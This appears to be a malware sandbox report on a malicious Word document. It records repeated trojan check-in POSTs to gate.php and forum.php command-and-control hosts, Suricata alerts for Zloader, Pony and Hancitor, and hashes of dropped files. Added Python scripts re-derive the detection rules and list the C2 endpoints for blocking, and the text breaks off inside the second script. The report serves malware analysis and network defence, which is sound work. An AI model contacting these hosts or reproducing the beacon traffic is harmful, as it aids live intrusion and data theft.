185.133.42.219:80 (keportsitno.com) | POST | keportsitno.com/bdl/gate.php | POST /bdl/gate.php HTTP/1.1<br>Accept: */*<br>Cache-Control: no-cache<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)<br>Host: keportsitno.com<br>Content-Length: 582<br>Connection: Close | 200 OK |
185.42.14.83:80 (tingotosling.com) | POST | tingotosling.com/bdl/gate.php | POST /bdl/gate.php HTTP/1.1<br>Accept: */*<br>Cache-Control: no-cache<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)<br>Host: tingotosling.com<br>Content-Length: 1041<br>Connection: Close | 200 OK |
185.133.42.219:80 (keportsitno.com) | POST | keportsitno.com/bdl/gate.php | POST /bdl/gate.php HTTP/1.1<br>Accept: */*<br>Cache-Control: no-cache<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)<br>Host: keportsitno.com<br>Content-Length: 256<br>Connection: Close | 200 OK |
86.110.117.167:80 (cethenjustte.com) | POST | cethenjustte.com/ls5/forum.php | POST /ls5/forum.php HTTP/1.1<br>Accept: */*<br>Content-Type: application/x-www-form-urlencoded<br>User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko<br>Host: cethenjustte.com<br>Content-Length: 111<br>Cache-Control: no-cache | 200 OK |
185.42.14.83:80 (tingotosling.com) | POST | tingotosling.com/bdl/gate.php | POST /bdl/gate.php HTTP/1.1<br>Accept: */*<br>Cache-Control: no-cache<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)<br>Host: tingotosling.com<br>Content-Length: 756<br>Connection: Close | 200 OK |
185.133.42.219:80 (keportsitno.com) | POST | keportsitno.com/bdl/gate.php | POST /bdl/gate.php HTTP/1.1<br>Accept: */*<br>Cache-Control: no-cache<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)<br>Host: keportsitno.com<br>Content-Length: 732<br>Connection: Close | 200 OK |
185.42.14.83:80 (tingotosling.com) | POST | tingotosling.com/bdl/gate.php | POST /bdl/gate.php HTTP/1.1<br>Accept: */*<br>Cache-Control: no-cache<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)<br>Host: tingotosling.com<br>Content-Length: 695<br>Connection: Close | 200 OK |
185.133.42.219:80 (keportsitno.com) | POST | keportsitno.com/bdl/gate.php | POST /bdl/gate.php HTTP/1.1<br>Accept: */*<br>Cache-Control: no-cache<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)<br>Host: keportsitno.com<br>Content-Length: 329<br>Connection: Close | 200 OK |
185.42.14.83:80 (tingotosling.com) | POST | tingotosling.com/bdl/gate.php | POST /bdl/gate.php HTTP/1.1<br>Accept: */*<br>Cache-Control: no-cache<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)<br>Host: tingotosling.com<br>Content-Length: 679<br>Connection: Close | 200 OK |
185.133.42.219:80 (keportsitno.com) | POST | keportsitno.com/bdl/gate.php | POST /bdl/gate.php HTTP/1.1<br>Accept: */*<br>Cache-Control: no-cache<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)<br>Host: keportsitno.com<br>Content-Length: 846<br>Connection: Close | 200 OK |
185.42.14.83:80 (tingotosling.com) | POST | tingotosling.com/bdl/gate.php | POST /bdl/gate.php HTTP/1.1<br>Accept: */*<br>Cache-Control: no-cache<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)<br>Host: tingotosling.com<br>Content-Length: 855<br>Connection: Close | 200 OK |
185.133.42.219:80 (keportsitno.com) | POST | keportsitno.com/bdl/gate.php | POST /bdl/gate.php HTTP/1.1<br>Accept: */*<br>Cache-Control: no-cache<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)<br>Host: keportsitno.com<br>Content-Length: 462<br>Connection: Close | 200 OK |
86.110.117.167:80 (cethenjustte.com) | POST | cethenjustte.com/ls5/forum.php | POST /ls5/forum.php HTTP/1.1<br>Accept: */*<br>Content-Type: application/x-www-form-urlencoded<br>User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko<br>Host: cethenjustte.com<br>Content-Length: 111<br>Cache-Control: no-cache | 200 OK |
185.42.14.83:80 (tingotosling.com) | POST | tingotosling.com/bdl/gate.php | POST /bdl/gate.php HTTP/1.1<br>Accept: */*<br>Cache-Control: no-cache<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)<br>Host: tingotosling.com<br>Content-Length: 711<br>Connection: Close | 200 OK |
185.133.42.219:80 (keportsitno.com) | POST | keportsitno.com/bdl/gate.php | POST /bdl/gate.php HTTP/1.1<br>Accept: */*<br>Cache-Control: no-cache<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)<br>Host: keportsitno.com<br>Content-Length: 682<br>Connection: Close | 200 OK |
185.42.14.83:80 (tingotosling.com) | POST | tingotosling.com/bdl/gate.php | POST /bdl/gate.php HTTP/1.1<br>Accept: */*<br>Cache-Control: no-cache<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)<br>Host: tingotosling.com<br>Content-Length: 875<br>Connection: Close | 200 OK |
185.133.42.219:80 (keportsitno.com) | POST | keportsitno.com/bdl/gate.php | POST /bdl/gate.php HTTP/1.1<br>Accept: */*<br>Cache-Control: no-cache<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)<br>Host: keportsitno.com<br>Content-Length: 1130<br>Connection: Close | 200 OK |
185.42.14.83:80 (tingotosling.com) | POST | tingotosling.com/bdl/gate.php | POST /bdl/gate.php HTTP/1.1<br>Accept: */*<br>Cache-Control: no-cache<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)<br>Host: tingotosling.com<br>Content-Length: 559<br>Connection: Close | 200 OK |
185.133.42.219:80 (keportsitno.com) | POST | keportsitno.com/bdl/gate.php | POST /bdl/gate.php HTTP/1.1<br>Accept: */*<br>Cache-Control: no-cache<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)<br>Host: keportsitno.com<br>Content-Length: 807<br>Connection: Close | 200 OK |
86.110.117.167:80 (cethenjustte.com) | POST | cethenjustte.com/ls5/forum.php | POST /ls5/forum.php HTTP/1.1<br>Accept: */*<br>Content-Type: application/x-www-form-urlencoded<br>User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko<br>Host: cethenjustte.com<br>Content-Length: 111<br>Cache-Control: no-cache | 200 OK |
185.42.14.83:80 (tingotosling.com) | POST | tingotosling.com/bdl/gate.php | POST /bdl/gate.php HTTP/1.1<br>Accept: */*<br>Cache-Control: no-cache<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)<br>Host: tingotosling.com<br>Content-Length: 419 | |
Connection: Close 200 OK More Details |
185.133.42.219:80 (keportsitno.com) | POST | keportsitno.com/bdl/gate.php | POST /bdl/gate.php HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: keportsitno.com
Content-Length: 1022
Connection: Close 200 OK More Details |
185.42.14.83:80 (tingotosling.com) | POST | tingotosling.com/bdl/gate.php | POST /bdl/gate.php HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: tingotosling.com
Content-Length: 344
Connection: Close 200 OK More Details |
185.133.42.219:80 (keportsitno.com) | POST | keportsitno.com/bdl/gate.php | POST /bdl/gate.php HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: keportsitno.com
Content-Length: 598
Connection: Close 200 OK More Details |
185.42.14.83:80 (tingotosling.com) | POST | tingotosling.com/bdl/gate.php | POST /bdl/gate.php HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: tingotosling.com
Content-Length: 446
Connection: Close 200 OK More Details |
185.133.42.219:80 (keportsitno.com) | POST | keportsitno.com/bdl/gate.php | POST /bdl/gate.php HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: keportsitno.com
Content-Length: 724
Connection: Close 200 OK More Details |
185.42.14.83:80 (tingotosling.com) | POST | tingotosling.com/bdl/gate.php | POST /bdl/gate.php HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: tingotosling.com
Content-Length: 1075
Connection: Close 200 OK More Details |
185.133.42.219:80 (keportsitno.com) | POST | keportsitno.com/bdl/gate.php | POST /bdl/gate.php HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: keportsitno.com
Content-Length: 1009
Connection: Close 200 OK More Details |
86.110.117.167:80 (cethenjustte.com) | POST | cethenjustte.com/ls5/forum.php | POST /ls5/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: cethenjustte.com
Content-Length: 111
Cache-Control: no-cache 200 OK More Details |
185.42.14.83:80 (tingotosling.com) | POST | tingotosling.com/bdl/gate.php | POST /bdl/gate.php HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: tingotosling.com
Content-Length: 1000
Connection: Close 200 OK More Details |
185.133.42.219:80 (keportsitno.com) | POST | keportsitno.com/bdl/gate.php | POST /bdl/gate.php HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: keportsitno.com
Content-Length: 1080
Connection: Close 200 OK More Details |
185.42.14.83:80 (tingotosling.com) | POST | tingotosling.com/bdl/gate.php | POST /bdl/gate.php HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: tingotosling.com
Content-Length: 629
Connection: Close 200 OK More Details |
185.133.42.219:80 (keportsitno.com) | POST | keportsitno.com/bdl/gate.php | POST /bdl/gate.php HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: keportsitno.com
Content-Length: 838
Connection: Close 200 OK More Details |
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
local -> 86.110.117.167:80 (TCP) | A Network Trojan was detected | ET TROJAN Fareit/Pony Downloader Checkin 2 | 2014411 |
local -> 23.21.223.243:80 (TCP) | Potential Corporate Privacy Violation | ET POLICY External IP Lookup api.ipify.org | 2021997 |
local -> 185.133.42.219:80 (TCP) | A Network Trojan was detected | ET TROJAN Trojan Generic - POST To gate.php with no referer | 2017930 |
local -> 185.133.42.219:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN Win32/Terdot.A / Zloader Checkin | 2809511 |
local -> 185.42.14.83:80 (TCP) | A Network Trojan was detected | ET TROJAN Trojan Generic - POST To gate.php with no referer | 2017930 |
local -> 185.42.14.83:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN Win32/Terdot.A / Zloader Checkin | 2809511 |
local -> 185.133.42.219:80 (TCP) | A Network Trojan was detected | ET TROJAN Trojan Generic - POST To gate.php with no referer | 2017930 |
local -> 185.133.42.219:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN Win32/Terdot.A / Zloader Checkin | 2809511 |
local -> 185.133.42.219:80 (TCP) | A Network Trojan was detected | ET TROJAN Trojan Generic - POST To gate.php with no referer | 2017930 |
local -> 185.133.42.219:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN Win32/Terdot.A / Zloader Checkin | 2809511 |
local -> 185.133.42.219:80 (TCP) | A Network Trojan was detected | ET TROJAN Trojan Generic - POST To gate.php with no referer | 2017930 |
local -> 185.133.42.219:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN Win32/Terdot.A / Zloader Checkin | 2809511 |
local -> 185.42.14.83:80 (TCP) | A Network Trojan was detected | ET TROJAN Trojan Generic - POST To gate.php with no referer | 2017930 |
local -> 185.42.14.83:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN Win32/Terdot.A / Zloader Checkin | 2809511 |
local -> 185.133.42.219:80 (TCP) | A Network Trojan was detected | ET TROJAN Trojan Generic - POST To gate.php with no referer | 2017930 |
local -> 185.133.42.219:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN Win32/Terdot.A / Zloader Checkin | 2809511 |
local -> 86.110.117.167:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN Tordal/Hancitor/Chanitor | 2819978 |
local -> 185.133.42.219:80 (TCP) | A Network Trojan was detected | ET TROJAN Trojan Generic - POST To gate.php with no referer | 2017930 |
local -> 185.42.14.83:80 (TCP) | A Network Trojan was detected | ET TROJAN Trojan Generic - POST To gate.php with no referer | 2017930 |
local -> 185.133.42.219:80 (TCP) | A Network Trojan was detected | ET TROJAN Trojan Generic - POST To gate.php with no referer | 2017930 |
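The generic hits in the alert table can be reproduced from the request headers the report shows. The script below is an added example, not part of the Hybrid Analysis report or of the Emerging Threats rule set: it parses two raw request heads copied from the traffic table (constructed samples; bodies are omitted because the report does not show them), applies the condition named by ET SID 2017930 (a POST whose path ends in gate.php with no Referer header), and flags the /ls5/forum.php traffic as a fixed-size beacon because all three POSTs to it carry Content-Length 111. The function names (parse_request, gate_php_without_referer, fixed_size_beacons, c2_endpoints) are this example's own, and the gate.php check is written from the rule's name, not from the rule body.

```python
"""Added example, not part of the Hybrid Analysis report or of any rule set.

Re-derives two of the report's Suricata hits from request headers alone:
the "POST to gate.php with no Referer" condition (ET SID 2017930) and a
fixed-size form POST repeating to one URI, which is how the /ls5/forum.php
traffic looks. Sample data is constructed from the report's traffic table;
request bodies are not shown in the report and are omitted here.
"""
from collections import defaultdict

UA_MSIE8 = ("Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; "
            ".NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; "
            "Media Center PC 6.0; .NET4.0C; .NET4.0E)")
UA_MSIE11 = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko"

# Two raw request heads copied from the report (constructed samples, no body).
GATE_REQ = ("POST /bdl/gate.php HTTP/1.1\r\nAccept: */*\r\nCache-Control: no-cache\r\n"
            f"User-Agent: {UA_MSIE8}\r\nHost: keportsitno.com\r\nContent-Length: 462\r\n"
            "Connection: Close\r\n\r\n")
FORUM_REQ = ("POST /ls5/forum.php HTTP/1.1\r\nAccept: */*\r\n"
             "Content-Type: application/x-www-form-urlencoded\r\n"
             f"User-Agent: {UA_MSIE11}\r\nHost: cethenjustte.com\r\nContent-Length: 111\r\n"
             "Cache-Control: no-cache\r\n\r\n")

# (dst_ip, host, uri, content_length) for every POST in the report's table, in order.
OBSERVED = [
    ("185.133.42.219", "keportsitno.com", "/bdl/gate.php", 462),
    ("86.110.117.167", "cethenjustte.com", "/ls5/forum.php", 111),
    ("185.42.14.83", "tingotosling.com", "/bdl/gate.php", 711),
    ("185.133.42.219", "keportsitno.com", "/bdl/gate.php", 682),
    ("185.42.14.83", "tingotosling.com", "/bdl/gate.php", 875),
    ("185.133.42.219", "keportsitno.com", "/bdl/gate.php", 1130),
    ("185.42.14.83", "tingotosling.com", "/bdl/gate.php", 559),
    ("185.133.42.219", "keportsitno.com", "/bdl/gate.php", 807),
    ("86.110.117.167", "cethenjustte.com", "/ls5/forum.php", 111),
    ("185.42.14.83", "tingotosling.com", "/bdl/gate.php", 419),
    ("185.133.42.219", "keportsitno.com", "/bdl/gate.php", 1022),
    ("185.42.14.83", "tingotosling.com", "/bdl/gate.php", 344),
    ("185.133.42.219", "keportsitno.com", "/bdl/gate.php", 598),
    ("185.42.14.83", "tingotosling.com", "/bdl/gate.php", 446),
    ("185.133.42.219", "keportsitno.com", "/bdl/gate.php", 724),
    ("185.42.14.83", "tingotosling.com", "/bdl/gate.php", 1075),
    ("185.133.42.219", "keportsitno.com", "/bdl/gate.php", 1009),
    ("86.110.117.167", "cethenjustte.com", "/ls5/forum.php", 111),
    ("185.42.14.83", "tingotosling.com", "/bdl/gate.php", 1000),
    ("185.133.42.219", "keportsitno.com", "/bdl/gate.php", 1080),
    ("185.42.14.83", "tingotosling.com", "/bdl/gate.php", 629),
    ("185.133.42.219", "keportsitno.com", "/bdl/gate.php", 838),
]


def parse_request(raw):
    """Split an HTTP/1.1 request head into method, URI and a lower-cased header map."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, uri, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "uri": uri, "headers": headers}


def gate_php_without_referer(req):
    """Condition named by ET SID 2017930: a POST whose path ends in gate.php and carries no Referer."""
    path = req["uri"].split("?", 1)[0]
    return req["method"] == "POST" and path.endswith("/gate.php") and "referer" not in req["headers"]


def fixed_size_beacons(observed, min_hits=2):
    """Return {(host, uri): length} for URIs hit at least min_hits times, always with the same Content-Length."""
    lengths = defaultdict(set)
    hits = defaultdict(int)
    for _ip, host, uri, clen in observed:
        lengths[(host, uri)].add(clen)
        hits[(host, uri)] += 1
    return {k: next(iter(v)) for k, v in lengths.items() if len(v) == 1 and hits[k] >= min_hits}


def c2_endpoints(observed):
    """Distinct (dst_ip, host, uri) tuples: the block-list entries to take from the report."""
    return sorted({(ip, host, uri) for ip, host, uri, _ in observed})


if __name__ == "__main__":
    for raw in (GATE_REQ, FORUM_REQ):
        req = parse_request(raw)
        print(req["uri"], "gate.php-no-referer" if gate_php_without_referer(req) else "-")
    print("fixed-size beacons:", fixed_size_beacons(OBSERVED))
    for endpoint in c2_endpoints(OBSERVED):
        print("C2:", *endpoint)
```

Run as a script it prints the three C2 endpoints, flags only the gate.php request under the 2017930 condition, and reports cethenjustte.com/ls5/forum.php as the one fixed-size beacon. The ETPRO family-specific signatures in the table (Terdot/Zloader, Tordal/Hancitor) belong to the paid rule set and are not re-derived here; these two header-only checks are a triage aid, not a replacement for them.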
Extracted Strings
Extracted Files
Informative 8
-
7ef3892eaa887c7f4234754ecd8adfc9a5d2df9b15bf2ac0df9d8f9a878dee38.LNK
- Size
- 733B (733 bytes)
- Type
- lnk
- Description
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Aug 8 15:09:32 2017, mtime=Tue Aug 8 15:09:32 2017, atime=Tue Aug 8 15:09:38 2017, length=211456, window=hide
- Runtime Process
- WINWORD.EXE (PID: 3524)
- MD5
- 5e196334243488696e1667150b42160b
- SHA1
- 5ab5ef09873bb0626a6b19a484fafe0c3c688c73
- SHA256
- 0bd186c14508b76ed30d9c0c2ce28c790f78d07410a8f9d4a59347dee8036c5f
-
~$Normal.dotm
- Size
- 162B (162 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3524)
- MD5
- 668a1463be4b0508451b21b68d52983b
- SHA1
- d5785d13504063c78a6a8f3933183e8aac5003d0
- SHA256
- dd8438f48a986e05f740ecd668cd119ab99f44b9c9babf690147d626391ffa2a
-
index.dat
- Size
- 257B (257 bytes)
- Type
- data
- Runtime Process
- svchost.exe (PID: 1588)
- MD5
- 55e4155db717ae6be96fdf2216035f12
- SHA1
- c758f0fbb4ee86e92f126dce8be602467cc6aabf
- SHA256
- f21f56fce07947b0b33bd9ed6c0ea1572eb4ebc1186885b208516a1a4bd9d55f
-
~WRS{22AB9B54-42E2-4ABD-8093-369D8FF6C997}.tmp
- Size
- 1KiB (1024 bytes)
- Type
- unknown
- Description
- FoxPro FPT, blocks size 0, next free block index 218103808, 1st used item "\375" (libmagic guess; a ~WRS{GUID}.tmp file is a Word scratch file written while the document is open, not a FoxPro memo file)
- Runtime Process
- WINWORD.EXE (PID: 3524)
- MD5
- 5d4d94ee7e06bbb0af9584119797b23a
- SHA1
- dbb111419c704f116efa8e72471dd83e86e49677
- SHA256
- 4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
-
BNEBB1.tmp
- Size
- 179KiB (183296 bytes)
- Type
- peexe executable
- Description
- PE32 executable (GUI) Intel 80386, for MS Windows
- Runtime Process
- svchost.exe (PID: 1588)
- MD5
- d98c62675968309a0fb29a5799b72ecb
- SHA1
- b644c2fd8280ed4d1db2a00f676ac71f13cc20b2
- SHA256
- f1b55a19cddfde9e2ba14dd4c51948ae236e982efdad927b50882b42f100b887
-
MSForms.exd
- Size
- 144KiB (147284 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3524)
- MD5
- 665b474c164a1c7df788d777ab0e93ec
- SHA1
- 95cf08ebe64c72ead69c2d073a23975a47a78145
- SHA256
- a0e27fbaf91909574cdc70192a58ae5954e8ebd7de68f1a6076d6ea335e285f3
-
~$f3892eaa887c7f4234754ecd8adfc9a5d2df9b15bf2ac0df9d8f9a878dee38.doc
- Size
- 162B (162 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3524)
- MD5
- 668a1463be4b0508451b21b68d52983b
- SHA1
- d5785d13504063c78a6a8f3933183e8aac5003d0
- SHA256
- dd8438f48a986e05f740ecd668cd119ab99f44b9c9babf690147d626391ffa2a
-
5820874.cvr
- Size
- 2KiB (2068 bytes)
- Type
- data
- MD5
- a6aa73778b3a928ee460a85737e1db2f
- SHA1
- 627ff83a8af82bb056fb716d665846c0269399c9
- SHA256
- 4d61209682cda0487ba3e5450fc99633358ee156875d43d372d21a77fbab0627
-
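Triage of the extracted-file list above, as an added example that is not part of the report: the records are copied from the list, and the labels use the usual meaning of each artifact (Word owner files with the ~$ prefix, ~WRS{GUID}.tmp scratch files, .cvr crash reports, the MSForms.exd control cache, the WinINet index.dat), which the report itself does not state. The function names (classify, triage, duplicate_hashes, pivot_hashes) are this example's own. It separates Office editing noise from the one dropped PE, and shows that ~$Normal.dotm and the ~$...doc entry are the same 162-byte content under two names.

```python
"""Added example, not part of the Hybrid Analysis report.

Sorts the report's 'Extracted Files' entries into Office editing noise and
artifacts worth pivoting on, and collapses entries that share a SHA-256.
Artifact meanings are the usual ones for these file names; the report itself
only lists the files.
"""
import re
from collections import defaultdict

# (name, size_bytes, type, runtime_process, sha256) copied from the report's list.
EXTRACTED = [
    ("7ef3892eaa887c7f4234754ecd8adfc9a5d2df9b15bf2ac0df9d8f9a878dee38.LNK", 733, "lnk",
     "WINWORD.EXE (PID: 3524)", "0bd186c14508b76ed30d9c0c2ce28c790f78d07410a8f9d4a59347dee8036c5f"),
    ("~$Normal.dotm", 162, "data", "WINWORD.EXE (PID: 3524)",
     "dd8438f48a986e05f740ecd668cd119ab99f44b9c9babf690147d626391ffa2a"),
    ("index.dat", 257, "data", "svchost.exe (PID: 1588)",
     "f21f56fce07947b0b33bd9ed6c0ea1572eb4ebc1186885b208516a1a4bd9d55f"),
    ("~WRS{22AB9B54-42E2-4ABD-8093-369D8FF6C997}.tmp", 1024, "unknown", "WINWORD.EXE (PID: 3524)",
     "4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1"),
    ("BNEBB1.tmp", 183296, "peexe executable", "svchost.exe (PID: 1588)",
     "f1b55a19cddfde9e2ba14dd4c51948ae236e982efdad927b50882b42f100b887"),
    ("MSForms.exd", 147284, "data", "WINWORD.EXE (PID: 3524)",
     "a0e27fbaf91909574cdc70192a58ae5954e8ebd7de68f1a6076d6ea335e285f3"),
    ("~$f3892eaa887c7f4234754ecd8adfc9a5d2df9b15bf2ac0df9d8f9a878dee38.doc", 162, "data",
     "WINWORD.EXE (PID: 3524)", "dd8438f48a986e05f740ecd668cd119ab99f44b9c9babf690147d626391ffa2a"),
    ("5820874.cvr", 2068, "data", "",   # the report lists no runtime process for this one
     "4d61209682cda0487ba3e5450fc99633358ee156875d43d372d21a77fbab0627"),
]

# Name patterns for files Word and Office produce on their own while a document is open.
OFFICE_NOISE = [
    (re.compile(r"^~\$"), "owner-file"),                                  # Word lock file; holds the editing user's name
    (re.compile(r"^~WRS\{[0-9A-F-]{36}\}\.tmp$", re.I), "word-scratch"),  # Word temporary scratch file
    (re.compile(r"\.cvr$", re.I), "office-crash-report"),                 # Office crash-recovery report
]


def classify(name, ftype, proc):
    """Label one record: Office noise, a PE payload, or a host artifact worth keeping."""
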